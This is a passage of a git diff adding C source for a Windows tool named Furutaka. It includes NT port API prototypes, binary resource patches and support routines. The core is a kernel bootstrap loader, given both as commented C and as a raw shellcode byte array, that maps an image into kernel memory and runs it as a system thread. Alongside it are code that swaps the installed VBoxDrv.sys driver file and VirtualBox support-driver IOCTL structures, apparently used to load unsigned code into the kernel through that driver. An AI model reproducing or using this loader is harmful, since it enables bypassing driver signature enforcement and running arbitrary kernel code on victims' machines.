HANDLE PortHandle, + _In_ PPORT_MESSAGE RequestMessage + ); + +NTSTATUS NTAPI NtRequestWaitReplyPort( + _In_ HANDLE PortHandle, + _In_ PPORT_MESSAGE RequestMessage, + _Out_ PPORT_MESSAGE ReplyMessage + ); + +NTSTATUS NTAPI NtClosePort( + _In_ HANDLE PortHandle + ); + +NTSTATUS NTAPI NtReplyWaitReceivePort( + _In_ HANDLE PortHandle, + _Out_opt_ PVOID *PortContext, + _In_opt_ PPORT_MESSAGE ReplyMessage, + _Out_ PPORT_MESSAGE ReceiveMessage + ); + +NTSTATUS NTAPI NtWriteRequestData( + _In_ HANDLE PortHandle, + _In_ PPORT_MESSAGE Message, + _In_ ULONG DataEntryIndex, + _In_ PVOID Buffer, + _In_ ULONG BufferSize, + _Out_opt_ PULONG NumberOfBytesWritten + ); + +NTSTATUS NTAPI NtReadRequestData( + _In_ HANDLE PortHandle, + _In_ PPORT_MESSAGE Message, + _In_ ULONG DataEntryIndex, + _Out_ PVOID Buffer, + _In_ ULONG BufferSize, + _Out_opt_ PULONG NumberOfBytesRead + ); + +NTSTATUS NTAPI NtConnectPort( + _Out_ PHANDLE PortHandle, + _In_ PUNICODE_STRING PortName, + _In_ PSECURITY_QUALITY_OF_SERVICE SecurityQos, + _Inout_opt_ PPORT_VIEW ClientView, + _Out_opt_ PREMOTE_PORT_VIEW ServerView, + _Out_opt_ PULONG MaxMessageLength, + _Inout_opt_ PVOID ConnectionInformation, + _Inout_opt_ PULONG ConnectionInformationLength + ); + +NTSTATUS NTAPI NtAcceptConnectPort( + _Out_ PHANDLE PortHandle, + _In_opt_ PVOID PortContext, + _In_ PPORT_MESSAGE ConnectionRequest, + _In_ BOOLEAN AcceptConnection, + _Inout_opt_ PPORT_VIEW ServerView, + _Out_opt_ PREMOTE_PORT_VIEW ClientView + ); diff --git a/Source/Furutaka/resource.h b/Source/Furutaka/resource.h new file mode 100644 index 0000000000000000000000000000000000000000..45563148ac5ac8b8509a3a29aff0b89cdbb70e2b GIT binary patch literal 900 zcmb7@-D<)>5QWcmq3^KZWuaEu7qBK5QjHRSXs@J3Q!Jv8nEp`u>TSQ-Xwf3UGHiC{ zFni|A4Eg@5tF8|$Qcn{F3f1RC-iy>yn`od<>|AH$*5%aILWwf1m2*;Uz{X&?3O#B` z)Y1j!^rX2~oD6)!Jp)^SBxDstbK(?aiFdhIVFXv1J=Hro8Ijd0@DiVE_fC=BHP2>T zR?ne3P)tWLS^_mS(L zNC*GetR~yq6W)ZnM}y7H_TEE{O)vx*lhq*(>FUrLy3+N@%q>{ESd(f&C9l&B%x2{_ q{_gmgZex$=Aol%MsdljbkGq_t?V_63reoYY)%Fj}{I1LCAI3lM>V1;{ literal 0 HcmV?d00001 diff --git a/Source/Furutaka/resource.rc b/Source/Furutaka/resource.rc new file mode 100644 index 0000000000000000000000000000000000000000..b664ad48057455329fd15ddf7ac662ce8eb3e77a GIT binary patch literal 4978 zcmd6r+iu%95QgWvz`ld(+_cy>vD>2ej$<3aI&lym&;kJrr*YC?vvJ@`V;s(x4ApyrbfJ%|3oe@& zUxU)z{z3m0=m>`)T7Tg87_D3ADLmTH-_SNK@@pG>b@=*yS^TSqSdhqj#~Q5UN!RGT zn{Nc<1K(=(LAnS(UlUnNEHy>v$X;Y9FAMCxOhwVHL+E)Xny%o{v<`mcqi8_HjNsbB zlP366k4JpJ^F*aPhwwPZYsF(kyuEa%_Mo0Z9np84X9h}GH^6tb<`ujLtUKg1zei`c zk*f){hmQ*bZ*6H&Zf(WF7#;p%_mSICEnB9g33d&ASwx5T>eU*cRTlete~9i~mlZUN z;-@&vURXWOv~7^{h-sH{$S!9TW%rupb4$%G$Wa$~vCs2~lw}gV-BF@#&)IXi_lg)( zKJkyNR+L-v-X`qS(sr)aI7ky;X(XV4+(yn_;JWWSwtBV==c76z(wo}%0o-iCgR9aYZ=gBo(H?s;%`-Z%Vf%4`N*w?@rbF@icrCsjtp=N5Ag z+8@C$U9tK|2qz3(U3v7h zs@gZPO3S;?x<}eJc=cF+<2cJE5BANWaRcfr_;`Ed->6P$xhmofdNuHq$X?U@>^-A4 z{yw1wspF3w$LGXRR8{r(WJf+GM1Bt5&UBH!V$&F7&GFTV$3dzTSM2J?L@Fn{!uLCu>vz zmOW`+Woy#(8a}%qqh0WPu}ggTF{VshhIqg-bL^tnxMVydI+jHKGR_>5v%F^7^@}Bq zSGC5$E}{3e#m~M#^HpNCG)hY&tuzn)|NSpQRr}BXiwHQTrKr|e5|(@TJ<*|m%kuv` Je_lfanew); + + PIMAGE_OPTIONAL_HEADER popth = + (PIMAGE_OPTIONAL_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER)); + + ULONG isz = popth->SizeOfImage; + HANDLE th; + + PIMAGE_BASE_RELOCATION rel; + DWORD_PTR delta; + LPWORD chains; + DWORD c, p, rsz; + + OBJECT_ATTRIBUTES attr; + + exbuffer = (ULONG_PTR)ExAllocatePoolWithTag( + NonPagedPool, isz + PAGE_SIZE, 'SldT') + PAGE_SIZE; + exbuffer &= ~(PAGE_SIZE - 1); + + if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC) + if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0) + { + rel = (PIMAGE_BASE_RELOCATION)((PBYTE)Image + + popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); + + rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; + delta = (DWORD_PTR)exbuffer - popth->ImageBase; + c = 0; + + while (c < rsz) { + p = sizeof(IMAGE_BASE_RELOCATION); + chains = (LPWORD)((PBYTE)rel + p); + + while (p < rel->SizeOfBlock) { + + switch (*chains >> 12) { + case IMAGE_REL_BASED_HIGHLOW: + *(LPDWORD)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += (DWORD)delta; + break; + case IMAGE_REL_BASED_DIR64: + *(PULONGLONG)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += delta; + break; + } + + chains++; + p += sizeof(WORD); + } + + c += rel->SizeOfBlock; + rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock); + } + } + + isz >>= 3; + for (pos = 0; pos < isz; pos++) + ((PULONG64)exbuffer)[pos] = ((PULONG64)Image)[pos]; + + InitializeObjectAttributes(&attr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL); + PsCreateSystemThread(&th, THREAD_ALL_ACCESS, &attr, NULL, NULL, + (PKSTART_ROUTINE)(exbuffer + popth->AddressOfEntryPoint), NULL); +} +*/ +static const unsigned char TDLBootstrapLoader_code[415] = { + 0x40, 0x53, 0x56, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x48, 0x83, 0xEC, 0x70, 0x4C, 0x8B, 0xE2, + 0x4C, 0x89, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xC9, 0x48, 0x8D, 0x1D, 0xDE, 0xFF, + 0xFF, 0xFF, 0x48, 0x81, 0xC3, 0x00, 0x02, 0x00, 0x00, 0x33, 0xC9, 0x41, 0xB8, 0x54, 0x64, 0x6C, + 0x53, 0x4C, 0x63, 0x73, 0x3C, 0x4C, 0x03, 0xF3, 0x45, 0x8B, 0x7E, 0x50, 0x41, 0x8D, 0x97, 0x00, + 0x10, 0x00, 0x00, 0x41, 0xFF, 0xD1, 0x45, 0x33, 0xED, 0x48, 0x8D, 0xB0, 0x00, 0x10, 0x00, 0x00, + 0x48, 0x81, 0xE6, 0x00, 0xF0, 0xFF, 0xFF, 0x41, 0x83, 0xBE, 0x84, 0x00, 0x00, 0x00, 0x05, 0x0F, + 0x86, 0xAB, 0x00, 0x00, 0x00, 0x41, 0x8B, 0x8E, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84, + 0x9C, 0x00, 0x00, 0x00, 0x48, 0x89, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x04, 0x0B, + 0x41, 0x8B, 0xAE, 0xB4, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xDE, 0x4D, 0x2B, 0x5E, 0x30, 0x48, 0x89, + 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xFD, 0x85, 0xED, 0x74, 0x63, 0x0F, 0x1F, 0x00, + 0x41, 0xB9, 0x08, 0x00, 0x00, 0x00, 0x4D, 0x8D, 0x50, 0x08, 0x45, 0x39, 0x48, 0x04, 0x76, 0x43, + 0x41, 0x0F, 0xB7, 0x02, 0x8B, 0xC8, 0xC1, 0xE9, 0x0C, 0x83, 0xF9, 0x03, 0x74, 0x17, 0x83, 0xF9, + 0x0A, 0x75, 0x22, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x4C, + 0x01, 0x1C, 0x0A, 0xEB, 0x10, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, + 0x03, 0x44, 0x01, 0x1C, 0x0A, 0x49, 0x83, 0xC2, 0x02, 0x41, 0x83, 0xC1, 0x02, 0x45, 0x3B, 0x48, + 0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x3B, 0xFD, 0x72, 0xA0, + 0x48, 0x8B, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, + 0x49, 0x8B, 0xD7, 0x4C, 0x8B, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x48, 0xC1, 0xEA, 0x03, 0x48, + 0x85, 0xD2, 0x74, 0x1D, 0x48, 0x8B, 0xCE, 0x48, 0x2B, 0xDE, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00, + 0x48, 0x8B, 0x04, 0x0B, 0x48, 0x89, 0x01, 0x48, 0x8D, 0x49, 0x08, 0x48, 0x83, 0xEA, 0x01, 0x75, + 0xEF, 0x0F, 0x57, 0xC0, 0xC7, 0x44, 0x24, 0x40, 0x30, 0x00, 0x00, 0x00, 0xF3, 0x0F, 0x7F, 0x44, + 0x24, 0x60, 0x4C, 0x89, 0x6C, 0x24, 0x48, 0x4C, 0x8D, 0x44, 0x24, 0x40, 0xC7, 0x44, 0x24, 0x58, + 0x00, 0x02, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x4C, 0x89, 0x6C, 0x24, + 0x50, 0x45, 0x33, 0xC9, 0x41, 0x8B, 0x46, 0x28, 0xBA, 0xFF, 0xFF, 0x1F, 0x00, 0x48, 0x03, 0xC6, + 0x4C, 0x89, 0x6C, 0x24, 0x30, 0x48, 0x89, 0x44, 0x24, 0x28, 0x4C, 0x89, 0x6C, 0x24, 0x20, 0x41, + 0xFF, 0xD4, 0x48, 0x83, 0xC4, 0x70, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5E, 0x5B, 0xC3 +}; diff --git a/Source/Furutaka/sup.c b/Source/Furutaka/sup.c new file mode 100644 index 0000000..b1d4b91 --- /dev/null +++ b/Source/Furutaka/sup.c @@ -0,0 +1,422 @@ +/******************************************************************************* +* +* (C) COPYRIGHT AUTHORS, 2016 +* +* TITLE: SUP.C +* +* VERSION: 1.00 +* +* DATE: 01 Feb 2016 +* +* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF +* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED +* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A +* PARTICULAR PURPOSE. +* +*******************************************************************************/ +#include "global.h" + +/* +* supGetSystemInfo +* +* Purpose: +* +* Wrapper for NtQuerySystemInformation. +* +*/ +PVOID supGetSystemInfo( + _In_ SYSTEM_INFORMATION_CLASS InfoClass + ) +{ + INT c = 0; + PVOID Buffer = NULL; + ULONG Size = 0x1000; + NTSTATUS status; + ULONG memIO; + PVOID hHeap = NtCurrentPeb()->ProcessHeap; + + do { + Buffer = RtlAllocateHeap(hHeap, HEAP_ZERO_MEMORY, (SIZE_T)Size); + if (Buffer != NULL) { + status = NtQuerySystemInformation(InfoClass, Buffer, Size, &memIO); + } + else { + return NULL; + } + if (status == STATUS_INFO_LENGTH_MISMATCH) { + RtlFreeHeap(hHeap, 0, Buffer); + Size *= 2; + c++; + if (c > 100) { + status = STATUS_SECRET_TOO_LONG; + break; + } + } + } while (status == STATUS_INFO_LENGTH_MISMATCH); + + if (NT_SUCCESS(status)) { + return Buffer; + } + + if (Buffer) { + RtlFreeHeap(hHeap, 0, Buffer); + } + return NULL; +} + +/* +* supGetNtOsBase +* +* Purpose: +* +* Return ntoskrnl base address. +* +*/ +ULONG_PTR supGetNtOsBase( + VOID + ) +{ + PRTL_PROCESS_MODULES miSpace; + ULONG_PTR NtOsBase = 0; + + miSpace = supGetSystemInfo(SystemModuleInformation); + while (miSpace != NULL) { + NtOsBase = (ULONG_PTR)miSpace->Modules[0].ImageBase; + RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, miSpace); + break; + } + return NtOsBase; +} + +/* +* supQueryResourceData +* +* Purpose: +* +* Load resource by given id (win32 FindResource, SizeofResource, LockResource). +* +*/ +PBYTE supQueryResourceData( + _In_ ULONG_PTR ResourceId, + _In_ PVOID DllHandle, + _In_ PULONG DataSize + ) +{ + NTSTATUS status; + ULONG_PTR IdPath[3]; + IMAGE_RESOURCE_DATA_ENTRY *DataEntry; + PBYTE Data = NULL; + ULONG SizeOfData = 0; + + if (DllHandle != NULL) { + + IdPath[0] = (ULONG_PTR)RT_RCDATA; //type + IdPath[1] = ResourceId; //id + IdPath[2] = 0; //lang + + status = LdrFindResource_U(DllHandle, (ULONG_PTR*)&IdPath, 3, &DataEntry); + if (NT_SUCCESS(status)) { + status = LdrAccessResource(DllHandle, DataEntry, &Data, &SizeOfData); + if (NT_SUCCESS(status)) { + if (DataSize) { + *DataSize = SizeOfData; + } + } + } + } + return Data; +} + +/* +* supBackupVBoxDrv +* +* Purpose: +* +* Backup virtualbox driver file if it already installed. +* +*/ +BOOL supBackupVBoxDrv( + _In_ BOOL bRestore + ) +{ + BOOL bResult = FALSE; + WCHAR szOldDriverName[MAX_PATH * 2]; + WCHAR szNewDriverName[MAX_PATH * 2]; + WCHAR szDriverDirName[MAX_PATH * 2]; + + if (!GetSystemDirectory(szDriverDirName, MAX_PATH)) { + return FALSE; + } + + _strcat(szDriverDirName, TEXT("\\drivers\\")); + + if (bRestore) { + _strcpy(szOldDriverName, szDriverDirName); + _strcat(szOldDriverName, TEXT("VBoxDrv.backup")); + if (PathFileExists(szOldDriverName)) { + _strcpy(szNewDriverName, szDriverDirName); + _strcat(szNewDriverName, TEXT("VBoxDrv.sys")); + bResult = MoveFileEx(szOldDriverName, szNewDriverName, + MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH); + } + } + else { + _strcpy(szOldDriverName, szDriverDirName); + _strcat(szOldDriverName, TEXT("VBoxDrv.sys")); + _strcpy(szNewDriverName, szDriverDirName); + _strcat(szNewDriverName, TEXT("VBoxDrv.backup")); + bResult = MoveFileEx(szOldDriverName, szNewDriverName, + MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH); + } + return bResult; +} + +/* +* supWriteBufferToFile +* +* Purpose: +* +* Create new file (or open existing) and write (append) buffer to it. +* +*/ +SIZE_T supWriteBufferToFile( + _In_ PWSTR lpFileName, + _In_ PVOID Buffer, + _In_ SIZE_T Size, + _In_ BOOL Flush, + _In_ BOOL Append + ) +{ + NTSTATUS Status; + DWORD dwFlag; + HANDLE hFile = NULL; + OBJECT_ATTRIBUTES attr; + UNICODE_STRING NtFileName; + IO_STATUS_BLOCK IoStatus; + LARGE_INTEGER Position; + ACCESS_MASK DesiredAccess; + PLARGE_INTEGER pPosition = NULL; + ULONG_PTR nBlocks, BlockIndex; + ULONG BlockSize, RemainingSize; + PBYTE ptr = (PBYTE)Buffer; + SIZE_T BytesWritten = 0; + + if (RtlDosPathNameToNtPathName_U(lpFileName, &NtFileName, NULL, NULL) == FALSE) + return 0; + + DesiredAccess = FILE_WRITE_ACCESS | SYNCHRONIZE; + dwFlag = FILE_OVERWRITE_IF; + + if (Append == TRUE) { + DesiredAccess |= FILE_READ_ACCESS; + dwFlag = FILE_OPEN_IF; + } + + InitializeObjectAttributes(&attr, &NtFileName, OBJ_CASE_INSENSITIVE, 0, NULL); + + __try { + Status = NtCreateFile(&hFile, DesiredAccess, &attr, + &IoStatus, NULL, FILE_ATTRIBUTE_NORMAL, 0, dwFlag, + FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, NULL, 0); + + if (!NT_SUCCESS(Status)) + __leave; + + pPosition = NULL; + + if (Append == TRUE) { + Position.LowPart = FILE_WRITE_TO_END_OF_FILE; + Position.HighPart = -1; + pPosition = &Position; + } + + if (Size < 0x80000000) { + BlockSize = (ULONG)Size; + Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL); + if (!NT_SUCCESS(Status)) + __leave; + + BytesWritten += IoStatus.Information; + } + else { + BlockSize = 0x7FFFFFFF; + nBlocks = (Size / BlockSize); + for (BlockIndex = 0; BlockIndex < nBlocks; BlockIndex++) { + + Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL); + if (!NT_SUCCESS(Status)) + __leave; + + ptr += BlockSize; + BytesWritten += IoStatus.Information; + } + RemainingSize = Size % BlockSize; + if (RemainingSize != 0) { + Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, RemainingSize, pPosition, NULL); + if (!NT_SUCCESS(Status)) + __leave; + BytesWritten += IoStatus.Information; + } + } + } + __finally { + if (hFile != NULL) { + if (Flush == TRUE) NtFlushBuffersFile(hFile, &IoStatus); + NtClose(hFile); + } + RtlFreeUnicodeString(&NtFileName); + } + return BytesWritten; +} + +/* +* supDetectObjectCallback +* +* Purpose: +* +* Comparer callback routine used in objects enumeration. +* +*/ +NTSTATUS NTAPI supDetectObjectCallback( + _In_ POBJECT_DIRECTORY_INFORMATION Entry, + _In_ PVOID CallbackParam + ) +{ + POBJSCANPARAM Param = (POBJSCANPARAM)CallbackParam; + + if (Entry == NULL) { + return STATUS_INVALID_PARAMETER_1; + } + + if (CallbackParam == NULL) { + return STATUS_INVALID_PARAMETER_2; + } + + if (Param->Buffer == NULL || Param->BufferSize == 0) { + return STATUS_MEMORY_NOT_ALLOCATED; + } + + if (Entry->Name.Buffer) { + if (_strcmpi_w(Entry->Name.Buffer, Param->Buffer) == 0) { + return STATUS_SUCCESS; + } + } + return STATUS_UNSUCCESSFUL; +} + +/* +* supEnumSystemObjects +* +* Purpose: +* +* Lookup object by name in given directory. +* +*/ +NTSTATUS NTAPI supEnumSystemObjects( + _In_opt_ LPWSTR pwszRootDirectory, + _In_opt_ HANDLE hRootDirectory, + _In_ PENUMOBJECTSCALLBACK CallbackProc, + _In_opt_ PVOID CallbackParam + ) +{ + BOOL cond = TRUE; + ULONG ctx, rlen; + HANDLE hDirectory = NULL; + NTSTATUS status; + NTSTATUS CallbackStatus; + OBJECT_ATTRIBUTES attr; + UNICODE_STRING sname; + + POBJECT_DIRECTORY_INFORMATION objinf; + + if (CallbackProc == NULL) { + return STATUS_INVALID_PARAMETER_4; + } + + status = STATUS_UNSUCCESSFUL; + + __try { + + // We can use root directory. + if (pwszRootDirectory != NULL) { + RtlSecureZeroMemory(&sname, sizeof(sname)); + RtlInitUnicodeString(&sname, pwszRootDirectory); + InitializeObjectAttributes(&attr, &sname, OBJ_CASE_INSENSITIVE, NULL, NULL); + status = NtOpenDirectoryObject(&hDirectory, DIRECTORY_QUERY, &attr); + if (!NT_SUCCESS(status)) { + return status; + } + } + else { + if (hRootDirectory == NULL) { + return STATUS_INVALID_PARAMETER_2; + } + hDirectory = hRootDirectory; + } + + // Enumerate objects in directory. + ctx = 0; + do { + + rlen = 0; + status = NtQueryDirectoryObject(hDirectory, NULL, 0, TRUE, FALSE, &ctx, &rlen); + if (status != STATUS_BUFFER_TOO_SMALL) + break; + + objinf = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, rlen); + if (objinf == NULL) + break; + + status = NtQueryDirectoryObject(hDirectory, objinf, rlen, TRUE, FALSE, &ctx, &rlen); + if (!NT_SUCCESS(status)) { + RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf); + break; + } + + CallbackStatus = CallbackProc(objinf, CallbackParam); + + RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf); + + if (NT_SUCCESS(CallbackStatus)) { + status = STATUS_SUCCESS; + break; + } + + } while (cond); + + if (hDirectory != NULL) { + NtClose(hDirectory); + } + + } + __except (EXCEPTION_EXECUTE_HANDLER) { + status = STATUS_ACCESS_VIOLATION; + } + + return status; +} + +/* +* supIsObjectExists +* +* Purpose: +* +* Return TRUE if the given object exists, FALSE otherwise. +* +*/ +BOOL supIsObjectExists( + _In_ LPWSTR RootDirectory, + _In_ LPWSTR ObjectName + ) +{ + OBJSCANPARAM Param; + + if (ObjectName == NULL) { + return FALSE; + } + + Param.Buffer = ObjectName; + Param.BufferSize = (ULONG)_strlen(ObjectName); + + return NT_SUCCESS(supEnumSystemObjects(RootDirectory, NULL, supDetectObjectCallback, &Param)); +} diff --git a/Source/Furutaka/sup.h b/Source/Furutaka/sup.h new file mode 100644 index 0000000..e1cd4fa --- /dev/null +++ b/Source/Furutaka/sup.h @@ -0,0 +1,59 @@ +/******************************************************************************* +* +* (C) COPYRIGHT AUTHORS, 2016 +* +* TITLE: SUP.H +* +* VERSION: 1.00 +* +* DATE: 01 Feb 2016 +* +* Common header file for the program support routines. +* +* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF +* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED +* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A +* PARTICULAR PURPOSE. +* +*******************************************************************************/ +#pragma once + +typedef NTSTATUS(NTAPI *PENUMOBJECTSCALLBACK)(POBJECT_DIRECTORY_INFORMATION Entry, PVOID CallbackParam); + +typedef struct _OBJSCANPARAM { + PWSTR Buffer; + ULONG BufferSize; +} OBJSCANPARAM, *POBJSCANPARAM; + +ULONG_PTR supGetNtOsBase( + VOID + ); + +PVOID supGetSystemInfo( + _In_ SYSTEM_INFORMATION_CLASS InfoClass + ); + +PBYTE supQueryResourceData( + _In_ ULONG_PTR ResourceId, + _In_ PVOID DllHandle, + _In_ PULONG DataSize + ); + +BOOL supBackupVBoxDrv( + _In_ BOOL bRestore + ); + +SIZE_T supWriteBufferToFile( + _In_ PWSTR lpFileName, + _In_ PVOID Buffer, + _In_ SIZE_T Size, + _In_ BOOL Flush, + _In_ BOOL Append + ); + +BOOL supIsObjectExists( + _In_ LPWSTR RootDirectory, + _In_ LPWSTR ObjectName + ); + +#define PathFileExists(lpszPath) (GetFileAttributes(lpszPath) != (DWORD)-1) diff --git a/Source/Furutaka/vbox.h b/Source/Furutaka/vbox.h new file mode 100644 index 0000000..8282178 --- /dev/null +++ b/Source/Furutaka/vbox.h @@ -0,0 +1,226 @@ +#include + +typedef void* RTR0PTR; + +typedef struct _SUPREQHDR { + /** Cookie. */ + uint32_t u32Cookie; + /** Session cookie. */ + uint32_t u32SessionCookie; + /** The size of the input. */ + uint32_t cbIn; + /** The size of the output. */ + uint32_t cbOut; + /** Flags. See SUPREQHDR_FLAGS_* for details and values. */ + uint32_t fFlags; + /** The VBox status code of the operation, out direction only. */ + int32_t rc; +} SUPREQHDR; + +/** SUP_IOCTL_COOKIE. */ +typedef struct _SUPCOOKIE { + /** The header. + * u32Cookie must be set to SUPCOOKIE_INITIAL_COOKIE. + * u32SessionCookie should be set to some random value. */ + SUPREQHDR Hdr; + union + { + struct + { + /** Magic word. */ + char szMagic[16]; + /** The requested interface version number. */ + uint32_t u32ReqVersion; + /** The minimum interface version number. */ + uint32_t u32MinVersion; + } In; + struct + { + /** Cookie. */ + uint32_t u32Cookie; + /** Session cookie. */ + uint32_t u32SessionCookie; + /** Interface version for this session. */ + uint32_t u32SessionVersion; + /** The actual interface version in the driver. */ + uint32_t u32DriverVersion; + /** Number of functions available for the SUP_IOCTL_QUERY_FUNCS request. */ + uint32_t cFunctions; + /** Session handle. */ + /*R0PTRTYPE(PSUPDRVSESSION)*/ PVOID pSession; + } Out; + } u; +} SUPCOOKIE, *PSUPCOOKIE; + +typedef struct _SUPLDROPEN { + /** The header. */ + SUPREQHDR Hdr; + union + { + struct + { + /** Size of the image we'll be loading. */ + uint32_t cbImage; + /** Image name. + * This is the NAME of the image, not the file name. It is used + * to share code with other processes. (Max len is 32 chars!) */ + char szName[32]; + } In; + struct + { + /** The base address of the image. */ + RTR0PTR pvImageBase; + /** Indicate whether or not the image requires loading. */ + BOOLEAN fNeedsLoading; + } Out; + } u; +} SUPLDROPEN, *PSUPLDROPEN; + +typedef enum _SUPLDRLOADEP { + SUPLDRLOADEP_NOTHING = 0, + SUPLDRLOADEP_VMMR0, + SUPLDRLOADEP_SERVICE, + SUPLDRLOADEP_32BIT_HACK = 0x7fffffff +} SUPLDRLOADEP; + +typedef struct _SUPSETVMFORFAST { + /** The header. */ + SUPREQHDR Hdr; + union + { + struct + { + /** The ring-0 VM handle (pointer). */ + PVOID pVMR0; + } In; + } u; +} SUPSETVMFORFAST, *PSUPSETVMFORFAST; + +typedef struct _SUPLDRLOAD +{ + /** The header. */ + SUPREQHDR Hdr; + union + { + struct + { + /** The address of module initialization function. Similar to _DLL_InitTerm(hmod, 0). */ + PVOID pfnModuleInit; + /** The address of module termination function. Similar to _DLL_InitTerm(hmod, 1). */ + PVOID pfnModuleTerm; + /** Special entry points. */ + union + { + /** SUPLDRLOADEP_VMMR0. */ + struct + { + /** The module handle (i.e. address). */ + RTR0PTR pvVMMR0; + /** Address of VMMR0EntryInt function. */ + RTR0PTR pvVMMR0EntryInt; + /** Address of VMMR0EntryFast function. */ + RTR0PTR pvVMMR0EntryFast; + /** Address of VMMR0EntryEx function. */ + RTR0PTR pvVMMR0EntryEx; + } VMMR0; + /** SUPLDRLOADEP_SERVICE. */ + struct + { + /** The service request handler. + * (PFNR0SERVICEREQHANDLER isn't defined yet.) */ + RTR0PTR pfnServiceReq; + /** Reserved, must be NIL. */ + RTR0PTR apvReserved[3]; + } Service; + } EP; + /** Address. */ + RTR0PTR pvImageBase; + /** Entry point type. */ + SUPLDRLOADEP eEPType; + /** The offset of the symbol table. */ + uint32_t offSymbols; + /** The number of entries in the symbol table. */ + uint32_t cSymbols; + /** The offset of the string table. */ + uint32_t offStrTab; + /** Size of the string table. */ + uint32_t cbStrTab; + /** Size of image (including string and symbol tables). */ + uint32_t cbImage; + /** The image data. */ + char achImage[1]; + } In; + } u; +} SUPLDRLOAD, *PSUPLDRLOAD; + + +#define RT_SIZEOFMEMB(type, member) ( sizeof(((type *)(void *)0)->member) ) +#define SUPCOOKIE_INITIAL_COOKIE 0x69726f74 /* 'tori' */ +#define SUP_IOCTL_COOKIE_SIZE_IN sizeof(SUPREQHDR) + RT_SIZEOFMEMB(SUPCOOKIE, u.In) +#define SUP_IOCTL_COOKIE_SIZE_OUT sizeof(SUPREQHDR) + RT_SIZEOFMEMB(SUPCOOKIE, u.Out) + +#define SUP_IOCTL_FLAG 128 + +#define SUP_CTL_CODE_SIZE(Function, Size) CTL_CODE(FILE_DEVICE_UNKNOWN, (Function) | SUP_IOCTL_FLAG, METHOD_BUFFERED, FILE_WRITE_ACCESS) +#define SUP_CTL_CODE_BIG(Function) CTL_CODE(FILE_DEVICE_UNKNOWN, (Function) | SUP_IOCTL_FLAG, METHOD_BUFFERED, FILE_WRITE_ACCESS) +#define SUP_CTL_CODE_FAST(Function) CTL_CODE(FILE_DEVICE_UNKNOWN, (Function) | SUP_IOCTL_FLAG, METHOD_NEITHER, FILE_WRITE_ACCESS) +#define SUP_CTL_CODE_NO_SIZE(uIOCtl) (uIOCtl) + +/** The magic value. */ +#define SUPREQHDR_FLAGS_MAGIC UINT32_C(0x42000042) +/** The default value. Use this when no special stuff is requested. */ +#define SUPREQHDR_FLAGS_DEFAULT SUPREQHDR_FLAGS_MAGIC +#define VERR_INTERNAL_ERROR (-225) +#define SUPCOOKIE_MAGIC "The Magic Word!" +#define SUPDRV_IOC_VERSION 0x001a0007 +/** The request size. */ +#define SUP_IOCTL_COOKIE_SIZE sizeof(SUPCOOKIE) +/** Negotiate cookie. */ +#define SUP_IOCTL_COOKIE SUP_CTL_CODE_SIZE(1, SUP_IOCTL_COOKIE_SIZE) + +/** There is extra input that needs copying on some platforms. */ +#define SUPREQHDR_FLAGS_EXTRA_IN UINT32_C(0x00000100) +/** There is extra output that needs copying on some platforms. */ +#define SUPREQHDR_FLAGS_EXTRA_OUT UINT32_C(0x00000200) + +/** @name SUP_IOCTL_SET_VM_FOR_FAST + * Set the VM handle for doing fast call ioctl calls. + * @{ + */ +#define SUP_IOCTL_SET_VM_FOR_FAST SUP_CTL_CODE_SIZE(19, SUP_IOCTL_SET_VM_FOR_FAST_SIZE) +#define SUP_IOCTL_SET_VM_FOR_FAST_SIZE sizeof(SUPSETVMFORFAST) +#define SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN 